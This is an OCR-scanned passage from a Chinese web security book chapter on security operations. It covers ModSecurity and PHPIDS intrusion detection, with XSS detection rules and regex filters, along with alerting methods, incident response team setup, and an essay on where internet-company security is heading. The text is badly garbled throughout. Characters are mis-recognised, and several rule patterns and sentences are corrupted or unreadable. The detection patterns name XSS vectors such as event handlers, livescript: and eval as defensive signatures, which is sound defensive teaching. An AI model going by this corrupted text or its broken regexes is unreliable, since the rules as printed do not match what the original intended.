IDS、WAF 等 设备 一 般 的 布 署 方式 是 串联 或 并 联 在 网 络 出 口 处 ， 对 网 站 
的 所 有 流量 进行 监控 。 在 开源 的 软件 中 ， 也 有 一 些 优秀 的 IDS， 比 如 
Mod-Security 束 是 一 个 非常 成 熟 的 WAF ° 

ModSecurity 是 Apache 的 一 个 Module， 它 能 获取 到 所 有 访问 Apache 
Httpd Server 的 请 求 ， 并 根据 目 己 的 规则 对 这 些 请 求 进行 匹配 ， 以 检测 


哪些 请 求 存 在 攻击 行为 。ModSecurity 的 架构 图 
Request Headers 


ModSecurity Phase:5 
Logging 


ModSecurity Phase:2 
Request Body 


ModSecurity Phase:4 
Response Body 


ModSecurityH) JU] LF seta T ABIWA, A DALI Eri 
区 的 安全 专家 维护 。 


SecRule REQUEST COOKIES| 

REQUEST COOKIES NAMES|REQUEST FILENAME| 
ARGS. NAMES | ARGS | XML : /* 
"NbonkeydownNbNwW*?Nz" N 


"phase:2,rev:'2.2.2',capture, t:none, t: htmlEnt 
ityDecode,t:compressWhiteSpace,t:1lo 
wercase,ctl:auditLogParts- 
*E,block,msg:'Cross-site Scripting (XSS) 
Attack',id:'958410',tag:'WEB ATTACK/ 

XSS', tag: WASCTC/WASC-8', tag: 'WASCTC/ 
WASC-22',tag 

:'OWASP TOP 10/A2',tag:'OWASP AppSensor/ 
IE1',tag:'PCI/6.5.1',logdata: '%{TX.0}', severi 
ty:'2',setvar:'tx.msg- 
%{rule.msg}',setvar:tx.xss_score=+ 
%{tx.critical_anomaly_score}, 
setvar:tx.anomaly_score=+ 
%{tx.critical_anomaly_score},setvar:tx. 
%{rule.id}-WEB_ATTACK 
/XSS-%{matched_var_name}=%{tx.0}" 

SecRule REQUEST COOKIES| 

REQUEST COOKIES NAMES|REQUEST FILENAME | 

ARGS. NAMES | ARGS | XML : /* 
"NbonmousemoveNbNW*?Nz" N 


"phase:2,rev:'2.2.2',capture, t:none, t: htmlEnt 
ityDecode,t:compressWhiteSpace,t:lo 
wercase,ctl:auditLogParts- 
*E,block,msg:'Cross-site Scripting (XSS) 
Attack',id:'958415',tag:'WEB ATTACK/ 

XSS', tag: WASCTC/WASC-8', tag: 'WASCTC/ 
WASC-22', tag 

: 'OWASP_TOP_10/A2', tag: 'OWASP_AppSensor/ 
IE1', tag: 'PCI/6.5.1', logdata: '%{TX.0}', severi 
ty: '2', setvar: 'tx.msg= 
%{rule.msg}',setvar:tx.xss_score=+ 
%{tx.critical_anomaly_score}, 
setvar:tx.anomaly_score=+ 
%{tx.critical_anomaly_score},setvar:tx. 
%{rule.id}-WEB_ATTACK 
/XSS-%{matched_var_name}=%{tx.0}" 

SecRule REQUEST COOKIES| 

REQUEST COOKIES NAMES|REQUEST FILENAME | 

ARGS NAMES | ARGS | XML: /* 

"\blivescript:" \ 


"phase:2,rev:'2.2.2',capture, t:none, t:htmlEnt 
ityDecode,t:compressWhiteSpace,t:lo 
wercase,ctl:auditLogParts- 
*E,block,msg:'Cross-site Scripting (XSS) 
Attack',id:'958022', tag: 'WEB_ATTACK/ 
XSS', tag: 'WASCTC/WASC-8', tag: 'WASCTC/ 
WASC-22', tag 
: 'OWASP_TOP_10/A2', tag: 'OWASP_AppSensor/ 
IE1', tag: 'PCI/6.5.1', logdata: '%{TX.0}', severi 
ty:'2', setvar: 'tx.msg= 
%{rule.msg}',setvar:tx.xss_score=+ 
%{tx.critical_anomaly_score}, 
setvar:tx.anomaly_score=+ 
%{tx.critical_anomaly_score},setvar:tx. 
%{rule.id}-WEB_ATTACK 
/XSS-%{matched_var_name}=%{tx.0}" 
另 一 个 同样 著名 的 开源 WAF 是 PHPIDS ° 
PHPIDS 是 为 PHP 应 用 设计 的 一 套 入 侵 检 测 系统 ， 它 与 应 用 代码 的 结合 更 为 紧密 ， 需 要 修改 应 用 代码 才能 使 用 它 。 通 过 如 下 方式 可 以 加 载 PH-PIDS 。 
require once 'IDS/Init.php'; 
$request - array( 

'REQUEST' -» $ REQUEST, 

'GET' => $ GET, 

'POST' => $ POST, 

'COOKIE' -» $ COOKIE 


di 

$init = IDS Init::init('IDS/Config/ 
Config.ini'); 

$ids = new IDS_Monitor($request, $init); 

$result = $ids->run(); 

if (!$result->isEmpty()) { 

// Take a look at the result object 

echo $result; 


} 


PHPIDS 的 规则 也 非常 完整 ， 它 是 以 正则 的 方式 写 在 XML 文件 中 的 ， 比 如 以 下 规则 : 


«filter» 
TA ia 
«rule»«! [CDATA[([^* : NsNw, .\/?+-]\s* ee [a- 
z]Ns) (?«! [a-zV/ QN-N|]) (Ns*returnNs*)?(? 
create(?:element|attribute|textnode)|[a- 
z]+events?|setattribute|getelement\w+|appendc 
hild|createrange|createcontextualfragment | 
removenode | parentnode |decodeuricomponent | \w 
ettimeout |option|useragent ) (?(1) [A\w%"] | (?: 
\s* [A@\s\w%", .+\-]))]]></rule> 
<description>Detects JavaScript DOM/ 
miscellaneous properties and 
methods</description> 
<tags> 
<tag>xss</tag> 
<tag>csrf</tag> 
<tag>id</tag> 
<tag>rfe</tag> 
</tags> 
<impact>6</impact> 
</filter> 
<filter> 
<id>16</id> 
<rule><! [CDATA[ ( [^*NsNw, .\/?+- ]\s*)?(2<! [a- 
mo-z]\s)(?<! [a-z\/_@]) (Ns*returnNs*)?(?:al 
ert | inputbox|showmodaldialog|showhelp| 
infinity|isnan|isnull|iterator |msgbox| 
executegl 
obal|expression| prompt |write(?:1n)?|confirm| 
dialog|urn|(?:un)?eval|exec|execscript|to 
string|status|execute |window|unescape| 
navigate|jquery|getscript|extend|prototype)(? 
$ 


( 
) [^w?6" ] | (2: NS * [^QNSNW96" , . 2 \7+\-]))]]></rule> 
«description»Detects possible 
includes and typical script methods</ 
description» 
«tags» 
<tag>xss</tag> 
<tag>csrf</tag> 
<tag>id</tag> 
<tag>rfe</tag> 
</tags> 
<impact>5</impact> 
</filter> 


但 是 在 实际 使 用 IDS 产 品 时 ， 需 要 根据 具体 情况 调整 规则 ， 避 人 免 误 报 。 
规则 的 优化 是 一 个 相对 较 长 的 过 程 ， 需 要 经 过 实践 的 检验 。 因 此 IDS 在 
很 多 时 候 仅 仅 是 报警 ， 而 不 会 由 程序 直接 处 理 报告 的 攻击 。 人 工 处 理 
报警 ， 会 带 来 运 介 成 本 的 提升 。 
i ee 在 应 用 中 也 可 以 实现 代码 级 的 安全 监控 功 
。 比如 在 实施 CSRF 方 案 时 ， 采 取 的 办 法 是 对 比 用 户 提 区 表单 中 的 
ice 与 当前 用 户 Session 中 的 token 是 否 一 致 。 当 比 对 失败 时 ， 可 以 由 应 
ee eR. 时 间 、URL、 用 户 名 等 相关 信息 。 这 些 
日 志 汇 总 后 ， RI ARER HD 警报 。 


AER POL 安全 日 志 ， 需 要 执行 IO 的 写 操作 ， 对 性 能 会 有 一 些 
影响 。 在 设计 方案 时 ， 要 考虑 到 这 种 写 日 志 的 动作 且 否 会 频繁 发 生 。 
在 正音 情况 下 ， 应 用 也 会 频 索 地 执行 写 日 志 的 动作 ， 那 么 这 个 日 志 
不 适合 局 用 。 安 全 日 志 也 属于 机 密 信息 ， 应 该 实时 地 保存 到 远程 服务 
an o 


18.5 ”紧急 响应 流程 

正如 前 文 所 述 ， 安 全 监控 的 目的 是 为 了 在 最 快 的 时 间 内 做 出 反应 ， 因 
此 报警 机 制 必 不 可 少 。 

入 侵 检测 系统 或 其 他 安全 监控 产品 的 规则 被 触发 时 ， 根 据 攻 击 的 严重 
程度 ， 最 终 会 产生 “事件 ”(Event) 或 “报警 ”(Alert) ， 报 警 是 一 种 主 
动 通知 管理 员 的 提醒 方式 。 

常见 的 报警 方式 有 三 种 。 

(1) 邮件 报警 

这 是 成 本 最 低 的 报警 方式 ， 建 立 一 个 SMTP 服 务 器 就 可 以 发 送 报警 邮 
件 。 当 一 个 监控 到 的 事件 发 生 时 ， 可 以 调用 邮件 API 发 出 邮件 报警 。 
但 是 邮件 报警 的 实时 性 较 差 ， 邮 件 从 发 出 到 接收 到 存在 一 定 的 时 间 
差 ， 且 邮件 服务 器 可 能 会 被 队列 堵塞 ， 导 致 邮件 延 时 或 者 丢 邮 件 。 

但 邮件 报警 的 好 处 是 ， 报 警 内 容 可 以 描写 得 丰富 翔实 。 

(2) IM 报 警 

通过 调用 一 些 IM 的 API， 可 以 实现 IM 报 警 。 如 果 公 司 没有 自己 的 IM 软 
件 ， 也 可 以 采用 一 些 开 源 的 IM。IM 报 警 相对 邮件 报警 来 说 实时 性 要 好 
一 些 ， 但 IM 报 警 的 内 容 长 度 有 限 ， 难 以 像 邮 件 报警 的 内 容 一 样 丰富 。 
(3) 短信 报警 

随 着 手机 的 普及 ， 短 信 报 警 也 成 为 越 来 越 重要 的 一 种 报警 方式 。 短 信 
报警 需要 架设 短信 网 关 ， 或 者 采用 互联 网 上 提供 的 一 些 短信 发 送 服 


务 。 


短信 报警 的 实时 性 最 好 ， 无 论 管 理 员 在 何 时 何 地 都 能 收 到 报警 。 但 短 
信 报 警 的 局 限 之 处 是 单条 短信 能 容纳 的 内 容 较 少 ， 因 此 短信 报警 内 容 
一 般 都 短小 精 悍 。 

监控 与 报警 都 建立 后 ， 就 可 以 开始 着手 制定 “紧急 啊 应 流程 * 了 。 紧急 
啊 应 流程 是 在 发 生 紧 急 安 全 事件 时 ， 需 要 司 动 的 一 个 用 于 快速 处 理事 
件 的 流程 。 很 多 时 候 由 于 缺乏 紧急 响应 流程 ， 或 者 紧急 响应 流程 执行 
T E ERR REP BLEU SCR SER, BAERE AAI 
建立 紧急 啊 应 流程 ， 首 先 要 建立 “紧急 啊 应 小 组 ”， 这 个 小 组 全 权 人 负责 
对 紧急 安全 事件 的 处 理 、 痪 源 协调 工作 。 小 组 成 员 需 要 包括 : 


技术 负责 人 

产品 负责 人 

最 了 解 技 术 架 构 的 资深 开发 工程 师 
资深 网 络 工程 师 
资深 系统 运 维 工程 师 

资深 DBA 

资深 安全 专家 

监控 工程 师 

公司 公关 


这 个 小 组 的 主要 工作 是 在 第 一 时 间 和 弄 清 楚 问 题 产 生 的 原因 ， 并 协调 相 
天 的 痪 源 进行 处 理 。 因 此 小 组 的 成 员 可 能 随时 扩大 。 

小 组 成 员 中 包含 公司 公关 ， 是 因为 遇 到 一 些 影响 较 大 的 安全 事件 时 ， 
需要 公关 发 对 外 的 新 闻 稿 。 由 于 公关 一 般 不 太 了 解 技 术 ， 因 此 公司 公 
人 
W o 

当 安 全 事件 发 生 时 ， 首 先 应 该 通知 到 安全 专家 ， 并 由 安全 专家 召集 紧 
| 


一 是 需要 保护 安全 事件 的 现场 。 从 以 往 的 经 验 看 ， 很 多 时 候 由 于 缺乏 
安全 专家 的 指导 ， 安 全 事件 的 现场 往往 被 工程 师 破坏 ， 这 对 后 续 分 析 
入 侵 行为 以 及 定 损 市 来 了 困难 。 
SARACEN, ECAR, DIATRIBE ARAM ATA 
都 有 哪些 ， 然 后 评 佑 入侵 事件 所 造成 的 损失 。 比 较 合 理 的 做 法 是 先 将 
被 入 侵 的 机 器 下 线 ， 在 线 下 进行 分 析 。 

二 是 以 最 快 的 速度 处 理 完 问题 。 紧 急 啊 应 流程 局 动 后 ， 就 十 与 时 间 争 
分 寺 秒 ， 因 此 务必 在 最 短 的 时 间 内 找到 对 应 的 人 ， 并 制定 出 相应 的 计 
划 ， 很 多 流程 能 省 则 省 。 这 也 是 为 何 需要 让 技术 负责 人 人、 产品 负责 
人 ， 以 及 各 个 领域 的 资深 工程 师 加 入 的 原因 。 紧 急 啊 应 小 组 的 成 员 ， 
一 是 要 是 最 了 解 公司 业务 和 洲 构 的 人 ， 这 样 才能 快速 定 位 和 解决 间 
题 。 

紧急 啊 应 流程 建立 以 后 ， 可 以 适当 地 进行 一 两 次 演习 ， 以 保证 流程 的 
有 效 性 。 这 些 ， 痢 是 安全 运营 需要 做 的 工作 。 


18.6 ”小结 

本 章 介 绍 了 安全 运营 的 一 些 方法 。 
7s H] X 4m HN A BE UE KB nf DÀ "Find andFix" ^ *Defend and 
Defer" ^ “Secure at the Source" =“S 7; [8], BE—-~N 7; Ta AY eZ ZR D E 
要 由 “安全 运营 ”来 保证 。 
安全 运 蔓 实施 的 好 坏 ， 将 决定 公司 安全 
全 运营 起 来 ， 在 变化 中 对 抗 攻击 ， 才 能 
程 ， 才 能 走 在 正确 的 道路 上 。 


AEG (ou uM 只 有 把 安 
真正 让 安全 成 为 一 个 持续 的 过 


(PR) 谈 谈 互联 网 企业 安全 的 发 展 方向 

讨论 范围 限定 在 互联 网 公司 ， 是 为 了 避免 和 一 些 安全 公司 打 口 水 战 。 
我 一 向 认为 互联 网 公司 的 安全 做 到 极致 后 ， 是 不 太 需 要 购买 安全 软件 
或 解决 方案 的 ， 因 为 一 个 大 的 互联 网 公司 发 展 到 一 定 程度 后 ， 其 规模 
和 复杂 程度 决定 了 世界 上 没有 哪 一 家 安全 公司 能 够 提供 这 样 的 解决 方 
案 ， 一 切 都 得 自力 更 生 。 当 然 这 句 话 也 不 是 绝对 的 ， 一 些 非 关 键 领 域 
或 者 基础 安全 领域 还 是 需要 安全 厂商 的 支持 ， 比 如 防火 墙 设备 、 桌 面 
安全 设备 、 防 DDOS 设 备 等 。 

但 我 今天 要 说 的 是 互联 网 公司 安全 的 方向 。 我 的 命题 是 : 我 们 今天 做 
了 什么 ， 做 得 够 不 够 ， 接 下 来 我 们 还 需要 做 些 什么 ? 

在 过 去 的 很 长 时 间 内 ， 无 论 是 漏洞 挖掘 者 还 是 安全 专家 们 ， 都 在 致力 
于 人 研究 各 种 各 样 的 漏洞 ， 以 此 为 代表 的 是 OWASP 每 隔 几 年 就 会 公布 的 
Top10 威 胁 List。 所 以 在 很 长 一 段 时 间 内 ， 互 联网 公司 的 安全 专家 们 ， 
包括 安全 厂商 的 产品 专家 们 ， 都 在 致力 于 做 一 件 事 情 : 不 管 是 产品 还 
是 方案 ， 尽 可 能 地 消灭 这 些 漏洞 。 

因此 ， 我 把 互联 网 公司 安全 的 第 一 个 目标 ， 定 义 为 : 让 工程 师 写 出 的 
每 一 行 代码 都 是 安全 的 ! 

这 第 一 个 目标 应 该 理解 为 互联 网 公司 的 产品 安全 。 一 个 以 产品 (包括 
网 站 、 在 线 服务 等 ， 在 互联 网 公司 里 在 线 服务 也 被 称 为 产品 ) 驱动 的 
公司 ， 要 做 安全 ， 第 一 件 事 情 必 然 是 要 保证 核心 业务 的 健康 发 展 。 为 
了 达到 这 个 目标 ， 微 软 有 了 SDL， 基 于 对 软件 工程 的 改造 ，SDL 可 以 
帮助 工程 师 编写 出 安全 的 代码 。 微 软 的 SDL 达 成 了 “让 微软 的 工程 师 写 
出 的 大 部 分 代码 都 是 安全 的 ”这 一 目标 。 所 以 我 认为 SDL 是 伟大 的 创 
造 ， 它 在 无 限 接近 终极 目标 。 

在 这 个 SDL 中 ， 我 们 就 有 很 多 东西 需要 去 完善 ， 也 促进 了 相当 多 的 簿 
生 技术 研究 和 技术 产品 。 比 如 代码 安全 扫描 工具 的 研究 ， 仅 此 一 项 ， 
束 涉 及 语法 分 析 、 词 法 分 析 、 数 据 关 联 、 统 计 学 等 诸多 问题 ， 再 比如 
fuzzing， 则 涉及 各 类 协议 或 文件 格式 、 统 计 学 、 数 据 处 理 、 调 试 与 回 
溯 、 可 重用 的 测试 环境 建设 等 诸多 复杂 问题 。 把 每 一 项 做 精 ， 都 不 是 
件 容 易 的 事情 。 

所 以 SDL 是 一 项 需要 长 期 坚持 和 不 断 完 善 的 工作 。 但 是 光 有 这 个 还 无 
法 100% 保 证 不 会 出 现 安全 问题 ， 于 是 我 定义 了 互联 网 公司 安全 的 第 二 
Md 
警 和 追踪 。 


这 第 二 个 目标 也 挺 宏 伟 的 ， 涉 及 许多 IDS、IPS、 蜜 鲍 方 面 的 研究 ， 但 
光 有 现 有 的 这 些 技术 ， 还 是 远 远 无 法 完成 这 个 日 标的 ， 因 为 现在 已 有 
的 商业 的 、 开 源 的 IDS 及 IPS 都 存在 着 种 种 局 限 性 ， 而 互联 网 公司 的 海 
量 数据 和 复杂 需求 ， 也 对 这 些 现 有 产品 提出 了 严峻 的 挑战 。 只 有 借助 
大 规模 超 强 的 计算 能 力 ， 实 施 有 效 的 数据 挖掘 和 数据 关联 工作 ， 或 者 
建立 更 加 立体 化 的 模型 ， 才 能 逐渐 通 近 这 一 目标 。 

这 个 目标 也 是 需要 无 限 逼 近 去 完成 的 一 个 宏伟 目标 。 我 目前 在 公司 做 
的 部 分 事情 ， 束 是 在 辣 着 这 个 目标 努力 ， 所 以 无 法 在 这 里 评 谈 、 深 
VR ° 

光 前 面 两 个 目标 ， 就 不 知道 需要 投入 多 少 人 力 、 时 间 来 努力 ， 但 我 还 
有 点 不 满足 ， 所 以 我 定义 了 第 三 个 目标 : 让 安全 成 为 公司 的 核心 竞争 
re eee er een 
在 一 开始 ， 我 们 使 用 电脑 时 ， 是 不 需要 安装 任何 杀毒 软件 的 。 但 是 到 
了 今天 ， 如 果 一 个 普通 用 户 新 买 了 电脑 ， 却 没有 安 狼 任何 的 杀毒 软件 
或 者 桌面 保护 软件 ， 那 么 大 家 都 会 担心 他 会 不 会 中 病毒 或 木马 。 这 种 
需求 和 市 场 ， 束 完全 是 病毒 和 杀毒 软件 厂商 培养 和 世 陶 出 来 的 。 所 以 
在 今天 ， 很 多 电脑 生产 商 甚至 在 电脑 出 三 时 就 会 预 装 一 个 杀毒 软件 。 
前 两 天 我 去 超市 ， 看 到 乐事 的 昔 片 捆绑 销售 一 盒 小 的 番 蕴 桨 。 我 马上 
想到 了 肯德基 和 和 麦当劳， 我 不 知道 在 它们 之 前 是 否 还 有 别 的 速 食品 是 
把 暮 条 和 番 访 次 配 在 一 起 销售 的 ， 但 是 我 认为 肯德基 和 麦当劳 改变 了 
人 们 吃 划 条 的 习惯 : 是 要 芯 着 番茄 酱 吃 的 。 所 以 乐事 的 暮 片 捆绑 销售 
番茄 警 ， 也 可 以 看 做 是 被 肯德基 做 出 来 的 需求 和 市 场 。 

所 以 ， 我 认为 做 互联 网 公司 安全 需要 达成 的 一 个 目标 是 让 安全 成 为 深 
深 植 入 产品 骨髓 的 一 个 功能 和 特性 ， 引 导 用 户 使 用 互联 网 的 习惯 ， 把 
这 个 需求 和 市 场 做 出 来 。 这 更 是 一 件 需要 长 期 投入 和 坚持 的 事情 。 
我 还 有 最 后 一 个 目标 : 能 够 观测 到 整个 互联 网 安全 趋势 的 变化 ， 对 未 
来 一 段 时 间 内 的 风险 做 出 预警 。 

这 个 预警 的 目标 也 是 我 们 部 门 当 初 草创 时 的 目标 之 一 ， 我 至 今 还 没有 
很 好 的 头绪 来 想 这 些 问题 。 但 是 这 个 目标 反而 是 今天 列举 的 这 些 目标 
中 最 容易 达到 的 一 个 ， 因 为 已 经 有 公司 在 做 了 ， 而 且 比 较 成 功 。 比 如 
McAfee 和 赛 门 铁 克 每 隅 一 段 时 间 都 会 有 互联 网 威胁 报告 ， 国 外 一 些 组 
织 比 如 SANS 等 也 有 类 似 的 报告 。 腾 讯 这 几 年 一 直 在 做 挂 马 检 测 方面 
的 工作 ， 所 以 他 们 也 能 在 一 定 程度 上 预警 挂 马 方面 的 趋势 。 


由 于 有 前 人 的 榜样 ， 再 借助 大 规模 的 客户 端 或 者 是 强力 搜索 引擎 的 海 
量 数 据 ， 要 做 这 件 事 情 的 路 线 和 方法 还 是 非常 清晰 的 ， 只 是 要 想 做 
好 ， 还 得 花 上 很 多 的 时 间 和 精力 。 

安全 技术 一 直 是 依附 于 技术 发 展 的 ， 不 光 是 技术 发 展开 民 了 新 的 需要 
安全 的 领域 ， 技 术 发 展 也 能 给 安全 技术 市 来 更 多 的 想象 空间 。 

比如 10 年 前 ， 甚 至 是 5 年 前 ， 可 能 我 们 都 不 需要 去 想 手 机 是 否 需 要 安全 
这 件 事 情 。 但 是 在 今天 ， 手 机 安全 已 经 成 为 刻不容缓 的 一 个 战场 ， 比 
人 这 些 已 经 是 实 实在 在 的 威 


而 手机 安全 反 过 来 也 促进 了 一 些 痢 的 安全 技术 ， 比 如 手机 认证 能 够 起 
到 与 客户 端 证 书 类 似 的 作用 ， 甚 至 比 客户 端 证 书 更 进一步 ， 因 为 手机 
不 是 痛 在 电脑 上 的 ， 而 是 放 在 用 户 的 裤 兜 里 的 。 类 似 的 还 有 随 痢 计算 
能 力 的 提升 ， 已 经 能 够 处 理 更 大 规模 的 数据 ， 从 而 使 得 安全 分 析 会 有 
一 些 新 的 发 展 和 变化 ， 这 些 都 征 在 过 去 不 敢 想 象 的 。 

在 互联 网 公司 做 安全 一 定 要 有 想象 力 ， 同 时 需要 紧密 关注 其 他 技术 领 
域 的 发 展 ， 这 样 束 不 会 止步 于 几 种 漏洞 的 研究 ， 而 会 发 现 有 非常 多 的 
有 趣 的 事情 正 等 着 去 做 ， 这 是 一 个 非常 安 伟 的 蓝图 。 
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